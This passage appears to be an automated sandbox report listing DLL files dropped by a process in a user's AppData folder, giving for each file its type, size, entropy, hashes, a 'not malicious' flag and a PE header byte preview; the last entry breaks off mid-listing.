                                                                                                                                                                                                            Size (bytes):4148720
                                                                                                                                                                                                            Entropy (8bit):6.462183686222023
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:EcDwCQsvkBD+ClI3IAVLA7Tr15SokomoqxQhT2bAssCFEUGX5ig:E7CKPsA3p0Z/QV/sS3Ag
                                                                                                                                                                                                            MD5:65F59CFC0C1C060CE20D3B9CEFFBAF46
                                                                                                                                                                                                            SHA1:CFD56D77506CD8C0671CA559D659DAB39E4AD3C2
                                                                                                                                                                                                            SHA-256:C81AD3C1111544064B1830C6F1AEF3C1FD13B401546AB3B852D697C0F4D854B3
                                                                                                                                                                                                            SHA-512:D6F6DC19F1A0495026CBA765B5A2414B6AF0DBFC37B5ACEED1CD0AE37B3B0F574B759A176D75B01EDD74C6CE9A3642D3D29A3FD7F166B53A41C8978F562B4B50
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!Fvge'.4e'.4e'.4l_.4i'.4.H.5m'.4.H.5a'.4.H.5|'.4.H.5c'.4.W.5o'.4qL.5`'.4e'.4.,.4.W.5.'.4.W.5d'.4.W.4d'.4e'.4d'.4.W.5d'.4Riche'.4........................PE..d......_.........." ......%..B......L.$.......................................?.......?...`.........................................0)2.P.....8.T.....>.......<..^...2?.......?.py......T.......................(.......0............ %..\...........................text.....%.......%................. ..`.rdata....... %.......%.............@..@.data....I...@;..2... ;.............@....pdata...^....<..`...R<.............@..@.rsrc.........>.......>.............@..@.reloc..py....?..z....>.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):330736
                                                                                                                                                                                                            Entropy (8bit):6.381828869454302
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:6qLZcTC3wR/0JNZ+csBkBv0L0hq+SvcO8MsvwbIeblsjTR:6qNcCwqHE2fYlsPR
                                                                                                                                                                                                            MD5:03761F923E52A7269A6E3A7452F6BE93
                                                                                                                                                                                                            SHA1:2CE53C424336BCC8047E10FA79CE9BCE14059C50
                                                                                                                                                                                                            SHA-256:7348CFC6444438B8845FB3F59381227325D40CA2187D463E82FC7B8E93E38DB5
                                                                                                                                                                                                            SHA-512:DE0FF8EBFFC62AF279E239722E6EEDD0B46BC213E21D0A687572BFB92AE1A1E4219322233224CA8B7211FFEF52D26CB9FE171D175D2390E3B3E6710BBDA010CB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............_._._..*_._,.^._..^._,.^._,.^._,.^._a.^._._=.._a.^._a.^._a.F_._.._._a.^._Rich._................PE..d......_.........." .........................................................@.......^....`.................................................((....... ...........0...........0..H...xL..T....................N..(....L..0............................................text............................... ..`.rdata..p...........................@..@.data...8...........................@....pdata...0.......2..................@..@.rsrc........ ......................@..@.reloc..H....0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):149488
                                                                                                                                                                                                            Entropy (8bit):6.116105454277536
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:4sSkET6pEXb3loojg1Q2sorWvZXF2sorrLA7cG27Qhvvc:4sSd6pwzloDbsnX0sCrc7ct7QVc
                                                                                                                                                                                                            MD5:A016545F963548E0F37885E07EF945C7
                                                                                                                                                                                                            SHA1:CBE499E53AB0BD2DA21018F4E2092E33560C846F
                                                                                                                                                                                                            SHA-256:6B56F77DA6F17880A42D2F9D2EC8B426248F7AB2196A0F55D37ADE39E3878BC6
                                                                                                                                                                                                            SHA-512:47A3C965593B97392F8995C7B80394E5368D735D4C77F610AFD61367FFE7658A0E83A0DBD19962C4FA864D94F245A9185A915010AFA23467F999C833982654C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'`.CF.KCF.KCF.KJ>.KGF.K.).JAF.KW-.JAF.K.).JVF.K.).JKF.K.).J@F.K.6.JFF.KCF.K.G.K.6.JPF.K.6.JBF.K.6.KBF.KCF.KBF.K.6.JBF.KRichCF.K........................PE..d......_.........." .....$..........t(.......................................p.......5....`............................................."..l........P.......0.......,.......`..L...hw..T....................x..(....w..0............@...............................text....".......$.................. ..`.rdata..z....@.......(..............@..@.data...x...........................@....pdata.......0......................@..@.rsrc........P......."..............@..@.reloc..L....`.......(..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5498352
                                                                                                                                                                                                            Entropy (8bit):6.619117060971844
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:KO+LIFYAPZtMym9RRQ7/KKIXSewIa/2Xqq1sfeOoKGOh6EwNmiHYYwBrK8KMlH0p:IGoKZdRqJD10rK8KMlH0gi5GX0oKZ
                                                                                                                                                                                                            MD5:4CD1F8FDCD617932DB131C3688845EA8
                                                                                                                                                                                                            SHA1:B090ED884B07D2D98747141AEFD25590B8B254F9
                                                                                                                                                                                                            SHA-256:3788C669D4B645E5A576DE9FC77FCA776BF516D43C89143DC2CA28291BA14358
                                                                                                                                                                                                            SHA-512:7D47D2661BF8FAC937F0D168036652B7CFE0D749B571D9773A5446C512C58EE6BB081FEC817181A90F4543EBC2367C7F8881FF7F80908AA48A7F6BB261F1D199
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x..................I.......I.......I.......I...........................................9.................................Rich............PE..d....._.........." ......3..P .......3.......................................T......MT...`.........................................0.D.P^....L.h....pS......0P..8....S.......S.d.....?.T...................`.?.(...0.?.0.............3.._...........................text.....3.......3................. ..`.rdata..8.....3.......3.............@..@.data.........O......dO.............@....pdata...8...0P..:....O.............@..@.rsrc........pS......4S.............@..@.reloc..d.....S......:S.............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):101872
                                                                                                                                                                                                            Entropy (8bit):6.5661918084228725
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:RCKWZGuEK0mOLSTxoPl9GIcuZrxi4hXX9oix8H+NCIecbGShwZul:RFWY1WxgGStJ8H2CIecbG36
                                                                                                                                                                                                            MD5:971DBBE854FC6AB78C095607DFAD7B5C
                                                                                                                                                                                                            SHA1:1731FB947CD85F9017A95FDA1DC5E3B0F6B42CA2
                                                                                                                                                                                                            SHA-256:5E197A086B6A7711BAA09AFE4EA7C68F0E777B2FF33F1DF25A21F375B7D9693A
                                                                                                                                                                                                            SHA-512:B966AAB9C0D9459FADA3E5E96998292D6874A7078924EA2C171F0A1A50B0784C24CC408D00852BEC48D6A01E67E41D017684631176D3E90151EC692161F1814D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w.............t:..............................................................Rich....................PE..d.....t^.........." .........^.......................................................e....`A.........................................0..4....9.......p.......P.......L...A..............8........................... ...0............................................text...2........................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):44528
                                                                                                                                                                                                            Entropy (8bit):6.627837381503075
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:Aim/NRETi8kykt25HwviU5fJUiP2551xWmbTqOA7SXf+Ny85xM8ATJWr3KWoC8cS:0Ie8kySL2iPQxdvjAevcMESW5lxJG
                                                                                                                                                                                                            MD5:6BC084255A5E9EB8DF2BCD75B4CD0777
                                                                                                                                                                                                            SHA1:CF071AD4E512CD934028F005CABE06384A3954B6
                                                                                                                                                                                                            SHA-256:1F0F5F2CE671E0F68CF96176721DF0E5E6F527C8CA9CFA98AA875B5A3816D460
                                                                                                                                                                                                            SHA-512:B822538494D13BDA947655AF791FED4DAA811F20C4B63A45246C8F3BEFA3EC37FF1AA79246C89174FE35D76FFB636FA228AFA4BDA0BD6D2C41D01228B151FD89
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ .S.A...A...A..0.m..A..O....A...9...A...A...A..O....A..O....A..O....A..O....A..O.}..A..O....A..Rich.A..................PE..d.....t^.........." .....:...4......pA...............................................Z....`A.........................................j......|k..x....................l...A......8....b..8...........................@b..0............P..X............................text....9.......:.................. ..`.rdata... ...P..."...>..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..8............j..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4173928
                                                                                                                                                                                                            Entropy (8bit):6.329102290474506
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:8BfmqCtLI4erBYysLjG/A8McPyCD6hw16JVTW7B3EgvVlQ3LAYmyNOvGJse+aWyb:8eZevVKACOvWYQF
                                                                                                                                                                                                            MD5:B0AE3AA9DD1EBD60BDF51CB94834CD04
                                                                                                                                                                                                            SHA1:EE2F5726AC140FB42D17ABA033D678AFAF8C39C1
                                                                                                                                                                                                            SHA-256:E994847E01A6F1E4CBDC5A864616AC262F67EE4F14DB194984661A8D927AB7F4
                                                                                                                                                                                                            SHA-512:756EBF4FA49029D4343D1BDB86EA71B2D49E20ADA6370FD7582515455635C73D37AD0DBDEEF456A10AB353A12412BA827CA4D70080743C86C3B42FA0A3152AA3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G..(.a.{.a.{.a.{..m{5a.{..l{.a.{.m{.a.{.o{.a.{.a.{.a.{.i{.a.{.l{.a.{.h{.a.{.q{.a.{.k{.a.{.n{.a.{Rich.a.{........................PE..d......R.........." ......;.........`.8......................................@@......a@...`...........................................;.u...P.>.d.....?.@.....=......t?.h<... ?..{..................................@a................>.P............................text.....;.......;................. ..`.data...h.....;.......;.............@....pdata........=......n<.............@..@.idata..@.....>......B>.............@..@.rsrc...@.....?......\>.............@..@.reloc....... ?......b>.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25072
                                                                                                                                                                                                            Entropy (8bit):5.961464514165753
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:KEyYvsyDQrjwgut4Maw+XZndDGg7Dgf2hU:RvszjwgocwOhdDGEUf2hU
                                                                                                                                                                                                            MD5:BB00EF1DD81296AF10FDFA673B4D1397
                                                                                                                                                                                                            SHA1:773FFCF4A231B963BAAC36CBEF68079C09B62837
                                                                                                                                                                                                            SHA-256:32092DE077FD57B6EF355705EC46C6D21F6D72FBE3D3A5DD628F2A29185A96FA
                                                                                                                                                                                                            SHA-512:C87C0868C04852B63A7399AFE4E568CD9A65B7B7D5FD63030ABEA649AAC5E9F2293AB5BE2B2CE56A57F2B4B1992AE730150A293ADA53637FC5CD7BE0A727CBD4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...Xv@.Xv@.Xv@. .@.Xv@.7wA.Xv@.3wA.Xv@.7sA.Xv@.7rA.Xv@.7uA.Xv@W(wA.Xv@.Xw@.Xv@W(sA.Xv@W(vA.Xv@W(.@.Xv@.X.@.Xv@W(tA.Xv@Rich.Xv@........PE..d...#._.........." .........0......................................................Z.....`.........................................`9.......B..d.......H....p.......F.......... ....3..T............................4..0............0...............................text............................... ..`.rdata..r#...0...$..................@..@.data........`.......:..............@....pdata.......p.......<..............@..@.rsrc...H............>..............@..@.reloc.. ............D..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3385328
                                                                                                                                                                                                            Entropy (8bit):6.382356347494905
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:sU0O89Onk/cNTgO/WSLqfTPnK+9eaOiY95ZEQryD1pPG3L:MaHUKt3L
                                                                                                                                                                                                            MD5:2247EE4356666335DF7D72129AF8D600
                                                                                                                                                                                                            SHA1:F0131C1A67FC17C0E8DCC4A4CA38C9F1780E7182
                                                                                                                                                                                                            SHA-256:50FAD5605B3D57627848B3B84A744DFB6A045609B8236B04124F2234676758D8
                                                                                                                                                                                                            SHA-512:67F2A7BF169C7B9A516689CF1B16446CA50E57F099B9B742CCB1ABB2DCDE8867F8F6305AD8842CD96194687FC314715AE04C1942B0E0A4F51B592B028C5B16D3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t..t..t....t.A.p..t.A.w..t.A.q..t.A.u..t.u..t..u..t...q..t...t..t......t.....t...v..t.Rich..t.........PE..d....._.........." ......&.........L.&.......................................3.......3...`..........................................0..]....0.......3.P.....1.L.....3.......3..;...},.T...................P.,.(... ~,.0.............'..............................text...o.&.......&................. ..`.rdata........'.......&.............@..@.data.........1.......0.............@....pdata..L.....1.......1.............@..@.rsrc...P.....3......J3.............@..@.reloc...;....3..<...P3.............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20923392
                                                                                                                                                                                                            Entropy (8bit):6.255903817217008
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:393216:LIckHor5uLnn83wAP5hxOZEa7/LzRuDFqILn5LgcKyZyQXt+8M:yEZbv
                                                                                                                                                                                                            MD5:7DBC97BFEE0C7AC89DA8D0C770C977B6
                                                                                                                                                                                                            SHA1:A064C8D8967AAA4ADA29BD9FEFBE40405360412C
                                                                                                                                                                                                            SHA-256:963641A718F9CAE2705D5299EAE9B7444E84E72AB3BEF96A691510DD05FA1DA4
                                                                                                                                                                                                            SHA-512:286997501E1F5CE236C041DCB1A225B4E01C0F7C523C18E9835507A15C0AC53C4D50F74F94822125A7851FE2CB2FB72F84311A2259A5A50DCE6F56BA05D1D7E8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[.@..............'.......'.......'..[...........|.-.....|.+.*...|.*.<....'......../.....q.*.....q.+....q.&.^...q.......q.,.....Rich............PE..d....._W.........." .....(....b.....|&....................................... E...........`.........................................0.1.t.....1...............9.`n............C..k.. . .T..................... .(..... ..............@...............................text...T&.......(.................. ..`.rdata..XvO..@...xO..,..............@..@.data....;....1.......1.............@....pdata..`n....9..p...D3.............@..@.gfids.......pC.......=.............@..@.tls..........C.......=.............@..._RDATA........C.......=.............@..@.reloc...k....C..l....=.............@..B................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):68080
                                                                                                                                                                                                            Entropy (8bit):6.207162014262433
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:mQ4IT53ign4CbtlO705xWL3frA5rlhgQJ7tapgUff:mLIT53Hbtk70OLs3hg0Cz
                                                                                                                                                                                                            MD5:750A31DE7840B5EED8BA14C1BD84D348
                                                                                                                                                                                                            SHA1:D345D13B0C303B7094D1C438E49F0046791DE7F6
                                                                                                                                                                                                            SHA-256:A9BFFB0F3CD69CD775C328C916E46440FE80D99119FAEBC350C7EC51E3E57C41
                                                                                                                                                                                                            SHA-512:5C0A68ED27A9F1BBFF104942152E475C94BB64B03CE252EAAC1A6770E24DC4156CE4ADE99EBCD92662801262DED892C33F84C605AD84472B45A83C4883D5E767
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............h..h..h...s.h..]...h.....h..]...h..]...h..]...h......h..h..&h......h......h......h......h..Rich.h..................PE..d...X._.........." .........b......$........................................@......{v....`......................................... ................ ..X....................0......H...T......................(.......0............................................text............................... ..`.rdata...E.......F..................@..@.data...............................@....pdata..............................@..@.qtmetadi...........................@..P.rsrc...X.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):41968
                                                                                                                                                                                                            Entropy (8bit):6.0993566622860635
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:VPs5g31JfDgej5JZmA0ZsEEC6lmn+4FdDGimUf2hr:VkC31ee7ZmA+sEEC6lmn+4FOUfc
                                                                                                                                                                                                            MD5:313F89994F3FEA8F67A48EE13359F4BA
                                                                                                                                                                                                            SHA1:8C7D4509A0CAA1164CC9415F44735B885A2F3270
                                                                                                                                                                                                            SHA-256:42DDE60BEFCF1D9F96B8366A9988626B97D7D0D829EBEA32F756D6ECD9EA99A8
                                                                                                                                                                                                            SHA-512:06E5026F5DB929F242104A503F0D501A9C1DC92973DD0E91D2DAF5B277D190082DE8D37ACE7EDF643C70AA98BB3D670DEFE04CE89B483DA4F34E629F8ED5FECF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n.:*..i*..i*..i#.Ei...i...h(..i>..h(..i...h8..i...h-..i...h(..i...h-..i*..i...i...h(..i...h+..i..)i+..i...h+..iRich*..i........................PE..d......_.........." .....@...F.......F..............................................C.....`..........................................g..x...hh..........H...........................xX..T....................Z..(....X..0............P...............................text....>.......@.................. ..`.rdata...3...P...4...D..............@..@.data................x..............@....pdata...............z..............@..@.qtmetadj...........................@..P.rsrc...H...........................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):39408
                                                                                                                                                                                                            Entropy (8bit):6.0316011626259405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ygk2hM0GskFtvPCjEIxh8eDzFyPddeeGvnhotdDGPUf2he:yN2a05kfPOEMaeDzFkddeFnhotOUfh
                                                                                                                                                                                                            MD5:52FD90E34FE8DED8E197B532BD622EF7
                                                                                                                                                                                                            SHA1:834E280E00BAE48A9E509A7DC909BEA3169BDCE2
                                                                                                                                                                                                            SHA-256:36174DD4C5F37C5F065C7A26E0AC65C4C3A41FDC0416882AF856A23A5D03BB9D
                                                                                                                                                                                                            SHA-512:EF3FB3770808B3690C11A18316B0C1C56C80198C1B1910E8AA198DF8281BA4E13DC9A6179BB93A379AD849304F6BB934F23E6BBD3D258B274CC31856DE0FC12B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3..3..3..KA.3..o\..3..X..3..o\..3..o\..3..o\..3.."C..3..3...3.."C..3.."C..3.."C-.3.."C..3..Rich.3..........PE..d...H._.........." .....@...B.......E...............................................^....`..........................................f..t....f..........@............~..............HW..T....................X..(....W..0............P...............................text...k?.......@.................. ..`.rdata..&)...P...*...D..............@..@.data...(............n..............@....pdata...............p..............@..@.qtmetads............v..............@..P.rsrc...@............x..............@..@.reloc...............|..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):45040
                                                                                                                                                                                                            Entropy (8bit):6.016125225197622
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:vEip0IlhxTDxut3dnm8IyAmQQ3ydJouEAkNypTAO0tfC3apmsdDG9Uf2hU:vxvXxgVIyA23ydJlEATpTAO0tfCKpms/
                                                                                                                                                                                                            MD5:AD84AF4D585643FF94BFA6DE672B3284
                                                                                                                                                                                                            SHA1:5D2DF51028FBEB7F6B52C02ADD702BC3FA781E08
                                                                                                                                                                                                            SHA-256:F4A229A082D16F80016F366156A2B951550F1E9DF6D4177323BBEDD92A429909
                                                                                                                                                                                                            SHA-512:B68D83A4A1928EB3390DEB9340CB27B8A3EB221C2E0BE86211EF318B4DD34B37531CA347C73CCE79A640C5B06FBD325E10F8C37E0CEE2581F22ABFBFF5CC0D55
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................a....Q........Q......Q......Q......................................Rich...........PE..d......_.........." .....B...N.......G...............................................&....`.............................................t...$...........@...........................xp..T....................r..(....p..0............`...............................text....@.......B.................. ..`.rdata...9...`...:...F..............@..@.data...............................@....pdata..............................@..@.qtmetadx...........................@..P.rsrc...@...........................@..@.reloc..............................@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):38384
                                                                                                                                                                                                            Entropy (8bit):5.957072398645384
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:zBXBEfQiAzC9Oh5AS7a3Z5OGrTDeV9mp7nnsWdDGgYUf2hi/:8JAzuOhy3zOGrTDeV9mp7nnsWjYUfz
                                                                                                                                                                                                            MD5:A9ABD4329CA364D4F430EDDCB471BE59
                                                                                                                                                                                                            SHA1:C00A629419509929507A05AEBB706562C837E337
                                                                                                                                                                                                            SHA-256:1982A635DB9652304131C9C6FF9A693E70241600D2EF22B354962AA37997DE0B
                                                                                                                                                                                                            SHA-512:004EA8AE07C1A18B0B461A069409E4061D90401C8555DD23DBF164A08E96732F7126305134BFAF8B65B0406315F218E05B5F0F00BEDB840FB993D648CE996756
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.G...G...G...N...C......E...S...E......R......O......D.......B...G...........D.......F.......F.......F...RichG...................PE..d...H._.........." .....4...H.......9....................................................`..........................................h..t...th..........@............z..............(X..T....................Y..(....X..0............P..8............................text....2.......4.................. ..`.rdata..B/...P...0...8..............@..@.data...h............h..............@....pdata...............l..............@..@.qtmetad.............r..............@..P.rsrc...@............t..............@..@.reloc...............x..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):421360
                                                                                                                                                                                                            Entropy (8bit):5.7491063936821405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
                                                                                                                                                                                                            MD5:16ABCCEB70BA20E73858E8F1912C05CD
                                                                                                                                                                                                            SHA1:4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
                                                                                                                                                                                                            SHA-256:FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
                                                                                                                                                                                                            SHA-512:3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):32240
                                                                                                                                                                                                            Entropy (8bit):5.978149408776758
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
                                                                                                                                                                                                            MD5:C0DE135782FA0235A0EA8E97898EAF2A
                                                                                                                                                                                                            SHA1:FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
                                                                                                                                                                                                            SHA-256:B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
                                                                                                                                                                                                            SHA-512:7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):31728
                                                                                                                                                                                                            Entropy (8bit):5.865766652452823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
                                                                                                                                                                                                            MD5:A913276FA25D2E6FD999940454C23093
                                                                                                                                                                                                            SHA1:785B7BC7110218EC0E659C0E5ACE9520AA451615
                                                                                                                                                                                                            SHA-256:5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
